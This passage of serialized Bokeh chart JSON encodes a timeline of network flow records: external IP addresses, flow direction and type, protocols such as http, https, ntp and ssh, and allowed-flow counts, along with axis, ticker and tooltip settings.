AAAFEAAAAAAAADwPwAAAAAAAABAAAAAAAAAMEAAAAAAAAAwQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAYQAAAAAAAABhAAAAAAAAAGEAAAAAAAADwPwAAAAAAADVAAAAAAAAANUAAAAAAAAAQQAAAAAAAABBAAAAAAAAA8D8AAAAAAAAUQAAAAAAAABRAAAAAAAAA8D8AAAAAAAAxQAAAAAAAADFAAAAAAAAACEAAAAAAAADwPwAAAAAAABhAAAAAAAAAGEAAAAAAAAAwQAAAAAAAADBAAAAAAAAAHEAAAAAAAAAcQAAAAAAAABxAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAiQAAAAAAAACJAAAAAAAAA8D8AAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAyQAAAAAAAADJAAAAAAAAAAEAAAAAAAADwPwAAAAAAAAhAAAAAAAAA8D8AAAAAAAA6QAAAAAAAADpAAAAAAAAAFEAAAAAAAAAUQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAQQAAAAAAAACJAAAAAAAAAIkAAAAAAAAAiQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAQQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAABAAAAAAAAANkAAAAAAAAA2QAAAAAAAAABAAAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAACEAAAAAAAAAIQAAAAAAAABBAAAAAAAAAEEAAAAAAAAAyQAAAAAAAADJAAAAAAAAAEEAAAAAAAADwPwAAAAAAADFAAAAAAAAAMUAAAAAAAADwPwAAAAAAAPA/AAAAAAAAEEAAAAAAAAAQQAAAAAAAAPA/AAAAAAAACEAAAAAAAAAxQAAAAAAAADFAAAAAAAAAEEAAAAAAAADwPwAAAAAAABRAAAAAAAAAFEAAAAAAAADwPwAAAAAAAPA/AAAAAAAA8D8AAAAAAAAzQAAAAAAAADNAAAAAAAAA8D8AAAAAAAAAQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAAMkAAAAAAAAAyQAAAAAAAABhAAAAAAAAAGEAAAAAAAAAQQAAAAAAAABBAAAAAAAAA8D8AAAAAAAAwQAAAAAAAADBAAAAAAAAAEEAAAAAAAAAQQAAAAAAAABRAAAAAAAAAFEAAAAAAAAAUQAAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAAPA/\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[372]},\"color\":[\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\",\"#365A8C\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371],\"y_index\":[2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2]},\"selected\":{\"id\":\"3718\"},\"selection_policy\":{\"id\":\"3719\"}},\"id\":\"3701\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"axis_label\":\"TotalAllowedFlows\",\"formatter\":{\"id\":\"3651\"},\"major_label_policy\":{\"id\":\"3649\"},\"ticker\":{\"id\":\"3624\"}},\"id\":\"3623\",\"type\":\"LinearAxis\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"3961\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"end\":1550164435500.0,\"start\":1549959313500.0},\"id\":\"3611\",\"type\":\"Range1d\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"3640\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"3607\"},{\"id\":\"3627\"},{\"id\":\"3628\"},{\"id\":\"3629\"},{\"id\":\"3630\"},{\"id\":\"3631\"}]},\"id\":\"3633\",\"type\":\"Toolbar\"},{\"attributes\":{\"data_source\":{\"id\":\"3901\"},\"glyph\":{\"id\":\"3903\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3904\"},\"view\":{\"id\":\"3906\"}},\"id\":\"3905\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"source\":{\"id\":\"3701\"}},\"id\":\"3706\",\"type\":\"CDSView\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"13.107.4.50\",\"8.249.241.254\",\"23.48.36.78\",\"23.223.3.100\",\"205.185.216.42\",\"8.253.45.249\",\"72.21.91.29\",\"13.107.4.50\",\"72.21.81.240\",\"40.87.63.92\",\"40.80.145.38\",\"99.84.106.178\",\"23.3.13.106\",\"99.84.106.27\",\"23.45.180.234\",\"99.84.106.92\",\"72.21.81.240\",\"23.3.13.146\",\"23.3.13.112\",\"72.21.91.29\",\"72.21.91.29\",\"13.107.4.50\",\"72.21.91.29\",\"72.21.91.29\",\"23.4.187.27\",\"205.185.216.42\",\"72.21.91.29\",\"72.21.91.29\",\"13.107.4.50\",\"23.48.36.47\",\"13.107.4.50\",\"23.45.180.121\",\"72.21.91.29\",\"173.194.61.40\",\"216.58.218.238\",\"72.21.81.240\",\"72.21.91.29\",\"13.107.4.50\",\"72.21.81.240\",\"23.4.187.27\",\"72.21.81.240\"],\"FlowDirection\":[\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\",\"O\"],\"FlowStartTime\":{\"__ndarray__\":\"AACUXB+OdkIAgFxXMY52QgCACTg1jnZCAIAJODWOdkIAgAk4NY52QgCACTg1jnZCAIAJODWOdkIAgAk4NY52QgCACTg1jnZCAIDBQzWOdkIAgMFDNY52QgCAZy47jnZCAIBnLjuOdkIAgGcuO452QgCAZy47jnZCAIBnLjuOdkIAgGcuO452QgCAZy47jnZCAIBnLjuOdkIAgHG1QI52QgCAa9lPjnZCAADeZVOOdkIAgH2mV452QgCA6/5ojnZCAICqWW2OdkIAgKpZbY52QgAATDp6jnZCAIComn6OdkIAAKknhY52QgAAqSeFjnZCAAAInoeOdkIAAAieh452QgAAnBqLjnZCAIAOoY+OdkIAgA6hj452QgAAfiSfjnZCAAB+JJ+OdkIAAIzao452QgAAjNqjjnZCAACQ/LmOdkIAAJD8uY52Qg==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[41]},\"FlowType\":[\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"AzurePublic\",\"AzurePublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\",\"ExternalPublic\"],\"L7Protocol\":[\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\",\"http\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAA8D8AAAAAAADwPwAAAAAAgERAAAAAAACAREAAAAAAAIBEQAAAAAAAgERAAAAAAACAREAAAAAAAIBEQAAAAAAAgERAAAAAAAAAAEAAAAAAAAAAQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAJEAAAAAAAAAkQAAAAAAAACRAAAAAAAAAJEAAAAAAAADwPwAAAAAAAPA/AAAAAAAA8D8AAAAAAADwPwAAAAAAAPA/AAAAAAAAAEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAA8D8AAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAPA/AAAAAAAAAEAAAAAAAAAAQAAAAAAAAAhAAAAAAAAACEAAAAAAAAAAQAAAAAAAAABAAAAAAAAACEAAAAAAAAAIQA==\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[41]},\"color\":[\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\",\"#46317E\"],\"index\":[372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"3686\"},\"selection_policy\":{\"id\":\"3687\"}},\"id\":\"3671\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@FlowStartTime\":\"datetime\"},\"tooltips\":[[\"FlowDirection\",\"@FlowDirection\"],[\"FlowStartTime\",\"@FlowStartTime{%F %T.%3N}\"],[\"TotalAllowedFlows\",\"@TotalAllowedFlows\"],[\"FlowType\",\"@FlowType\"],[\"AllExtIPs\",\"@AllExtIPs\"],[\"L7Protocol\",\"@L7Protocol\"]]},\"id\":\"3607\",\"type\":\"HoverTool\"},{\"attributes\":{\"axis\":{\"id\":\"3893\"},\"ticker\":null},\"id\":\"3896\",\"type\":\"Grid\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"3632\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"label\":{\"value\":\"ntp\"},\"renderers\":[{\"id\":\"3807\"}]},\"id\":\"3840\",\"type\":\"LegendItem\"},{\"attributes\":{\"label\":{\"value\":\"https\"},\"renderers\":[{\"id\":\"3705\"}]},\"id\":\"3732\",\"type\":\"LegendItem\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"3657\"},{\"id\":\"3658\"},{\"id\":\"3659\"},{\"id\":\"3660\"},{\"id\":\"3661\"},{\"id\":\"3662\"},{\"id\":\"3663\"},{\"id\":\"3664\"},{\"id\":\"3665\"},{\"id\":\"3666\"},{\"id\":\"3667\"},{\"id\":\"3668\"}]},\"id\":\"3620\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"3769\",\"type\":\"VBar\"},{\"attributes\":{\"data_source\":{\"id\":\"3733\"},\"glyph\":{\"id\":\"3735\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"3736\"},\"view\":{\"id\":\"3738\"}},\"id\":\"3737\",\"type\":\"GlyphRenderer\"},{\"attributes\":{},\"id\":\"3617\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"3624\",\"type\":\"BasicTicker\"},{\"attributes\":{\"text\":\"Timeline\"},\"id\":\"3609\",\"type\":\"Title\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"104.211.30.1\",\"10.0.3.4\",\"10.0.3.5\",\"104.211.30.1\"],\"FlowDirection\":[\"O\",\"O\",\"I\",\"O\"],\"FlowStartTime\":{\"__ndarray__\":\"AABGPjuOdkIAgHFWO452QgCAcVY7jnZCAID/3zyOdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[4]},\"FlowType\":[\"IntraVNet\",\"IntraVNet\",\"IntraVNet\",\"IntraVNet\"],\"L7Protocol\":[\"ssh\",\"ssh\",\"ssh\",\"ssh\"],\"TotalAllowedFlows\":{\"__ndarray__\":\"AAAAAAAAGEAAAAAAAADwPwAAAAAAAPA/AAAAAAAAKEA=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[4]},\"color\":[\"#9DD93A\",\"#9DD93A\",\"#9DD93A\",\"#9DD93A\"],\"index\":[456,457,458,459],\"y_index\":[6,6,6,6]},\"selected\":{\"id\":\"3866\"},\"selection_policy\":{\"id\":\"3867\"}},\"id\":\"3841\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"3955\",\"type\":\"DaysTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"3953\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"3952\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"axis\":{\"id\":\"3619\"},\"grid_line_alpha\":0.3,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"3622\",\"type\":\"Grid\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"3899\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"3673\",\"type\":\"VBar\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"3805\",\"type\":\"VBar\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"3954\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"3735\",\"type\":\"VBar\"},{\"attributes\":{},\"id\":\"3719\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"3640\"},\"major_label_policy\":{\"id\":\"3652\"},\"ticker\":{\"id\":\"3620\"}},\"id\":\"3619\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.7},\"fill_color\":{\"field\":\"color\"},\"line_alpha\":{\"value\":0.7},\"line_color\":{\"field\":\"color\"},\"top\":{\"field\":\"TotalAllowedFlows\"},\"width\":{\"value\":4},\"x\":{\"field\":\"FlowStartTime\"}},\"id\":\"3644\",\"type\":\"VBar\"},{\"attributes\":{},\"id\":\"3613\",\"type\":\"DataRange1d\"},{\"attributes\":{\"data\":{\"AllExtIPs\":[\"65.55.44.109\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"104.43.212.12\",\"40.77.232.95\",\"65.55.44.109\",\"40.77.228.69\",\"13.71.172.130\",\"13.71.172.128\",\"40.124.45.19\",\"172.217.15.99\",\"65.55.44.109\",\"13.71.172.130\",\"40.85.232.64\",\"13.71.172.128\",\"104.43.212.12\",\"40.124.45.19\",\"20.38.98.100\",\"23.96.64.84\",\"65.55.44.108\",\"65.55.44.109\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"40.77.232.95\",\"13.71.172.130\",\"13.71.172.128\",\"40.77.228.69\",\"65.55.44.109\",\"40.124.45.19\",\"23.96.64.84\",\"20.38.98.100\",\"13.82.152.48\",\"65.55.44.109\",\"13.71.172.130\",\"13.71.172.128\",\"40.124.45.19\",\"13.71.172.130\",\"13.71.172.128\",\"40.77.232.95\",\"65.55.44.109\",\"40.124.45.19\",\"40.77.226.250\",\"20.38.98.100\",\"13.71.172.128\",\"13.65.107.32\",\"40.124.45.19\",\"13.67.143.117\",\"52.165.170.112\",\"52.173.28.179\",\"13.71.172.130\",\"40.77.232.95\",\"13.68.93.109\",\"40.77.228.69\",\"65.52.108.92\",\"65.55.44.109\",\"13.83.149.5\",\"13.83.148.235\",\"168.62.32.212\",\"20.38.98.100\",\"40.121.3.131\",\"52.239.152.10\",\"23.47.27.169\",\"65.55.163.78\",\"172.217.15.78\",\"65.55.163.76\",\"172.217.8.3\",\"13.74.179.117\",\"65.55.252.190\",\"13.71.172.128\",\"13.71.172.130\",\"40.124.45.19\",\"13.65.107.32\",\"13.67.143.117\",\"40.69.153.67\",\"65.55.44.109\",\"40.77.228.69\",\"99.84.104.63\",\"157.55.134.136\",\"72.21.81.200\",\"204.79.197.200\",\"13.68.226.108\",\"212.13.197.231\",\"46.43.34.31\",\"13.71.172.128\",\"13.71.172.130\",\"52.183.114.173\",\"40.124.45.19\",\"13.65.107.32\",\"65.55.44.109\",\"40.79.85.125\",\"40.77.228.69\",\"13.67.143.117\",\"104.43.212.12\",\"52.239.152.10\",\"20.38.98.100\",\"40.77.226.250\",\"13.71.172.130\",\"65.55.44.109\",\"65.55.44.108\",\"40.77.226.250\",\"40.77.232.95\",\"13.71.172.130\",\"40.79.85.125\",\"65.55.44.109\",\"40.124.45.19\",\"20.38.98.100\",\"13.71.172.130\",\"40.124.45.19\",\"65.55.44.109\",\"40.77.228.69\",\"172.217.8.3\",\"13.71.172.130\",\"65.55.44.109\",\"65.55.44.108\",\"40.77.228.69\",\"40.124.45.19\",\"13.71.172.130\",\"65.55.44.108\",\"65.55.44.109\",\"40.77.232.95\",\"72.21.81.200\",\"13.71.172.130\",\"20.38.98.100\",\"40.124.45.19\",\"13.68.93.109\",\"65.55.44.108\",\"40.77.228.69\",\"65.55.44.109\",\"13.71.172.130\",\"65.55.44.108\",\"65.55.44.109\",\"40.77.226.250\",\"40.124.45.19\",\"40.77.232.95\",\"13.71.172.130\",\"65.55.44.108\",\"65.55.44.109\",\"172.217.15.99\",\"40.124.45.19\",\"20.38.98.100\",\"13.71.172.130\",\"65.55.44.109\",\"40.77.228.69\",\"13.71.172.130\",\"40.124.45.19\",\"40.77.228.69\",\"65.55.44.109\",\"65.55.44.108\",\"40.77.226.250\",\"13.71.172.130\",\"20.38.98.100\",\"65.55.44.108\",\"65.55.44.109\",\"